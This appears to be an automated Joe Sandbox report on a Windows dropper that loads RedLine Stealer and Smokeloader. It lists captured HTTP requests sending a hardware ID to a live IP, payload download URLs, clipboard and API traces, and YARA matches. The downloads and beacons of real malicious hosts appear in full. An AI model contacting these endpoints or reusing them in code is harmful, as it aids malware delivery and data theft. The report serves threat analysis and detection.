00 c0 2e 72 73 72 63 00 00 00 08 01 20 00 00 00 06 00 00 f2 01 00 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--

Source: Joe Sandbox View

IP Address: 62.204.41.150 62.204.41.150

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60061 -> 176.113.115.37:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:60060 -> 172.67.179.207:443

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

15_2_001229BA

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa
Source: global traffic	DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--

Source: Welding.pif, Welding.pif, 0000000F.00000002.4150963294.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe:
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/Hx
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/L
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php32
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;C7
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpDZT
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpL
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpXZH
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpd
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/ows
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150PT~
Source: Welding.pif	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exegyaCannot
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: M13W1o3scc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728096026.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2028195478.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/P
Source: Welding.pif	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DEvector
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 60060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60060

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00124830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	15_2_00124830
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BEF4F IsClipboardFormatAvailable,EmptyClipboard,SetClipboardData,	15_2_000BEF4F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,	15_2_004016E3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004026BB InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,	15_2_004026BB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00124632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

15_2_00124632

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_0013D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

15_2_0013D164

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114254: CreateFileW,DeviceIoControl,CloseHandle,

15_2_00114254

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00108F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

15_2_00108F2E

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00115778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		15_2_00115778

Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\EffortCoupled	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\FindingItunes	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\RaleighWard	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D23F5	15_2_000D23F5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00138400	15_2_00138400
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6502	15_2_000E6502
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E265E	15_2_000E265E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE6F0	15_2_000BE6F0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D282A	15_2_000D282A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E89BF	15_2_000E89BF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130A3A	15_2_00130A3A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6A74	15_2_000E6A74
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C0BE0	15_2_000C0BE0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DCD51	15_2_000DCD51
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0010EDB2	15_2_0010EDB2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118E44	15_2_00118E44
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130EB7	15_2_00130EB7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6FE6	15_2_000E6FE6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BB020	15_2_000BB020
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D33B7	15_2_000D33B7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DF409	15_2_000DF409
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CD45D	15_2_000CD45D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B94E0	15_2_000B94E0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CF628	15_2_000CF628
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B1663	15_2_000B1663
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D16B4	15_2_000D16B4
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D78C3	15_2_000D78C3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1BA8	15_2_000D1BA8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DDBA5	15_2_000DDBA5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B9C80	15_2_000B9C80
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E9CE5	15_2_000E9CE5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CDD28	15_2_000CDD28
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1FC0	15_2_000D1FC0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DBFD6	15_2_000DBFD6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040806D	15_2_0040806D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438013	15_2_00438013
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428434	15_2_00428434
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042E56A	15_2_0042E56A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00429510	15_2_00429510
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0041765F	15_2_0041765F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004146D5	15_2_004146D5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438729	15_2_00438729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004287A6	15_2_004287A6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040F91D	15_2_0040F91D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428A50	15_2_00428A50
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00419A5F	15_2_00419A5F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042FB60	15_2_0042FB60
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428D17	15_2_00428D17
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00414EBB	15_2_00414EBB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428FD2	15_2_00428FD2

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\773416\Welding.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000C1A36 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004108AC appears 36 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 00410D5B appears 127 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004116D0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: String function: 004062A3 appears 58 times

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs M13W1o3scc.exe

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
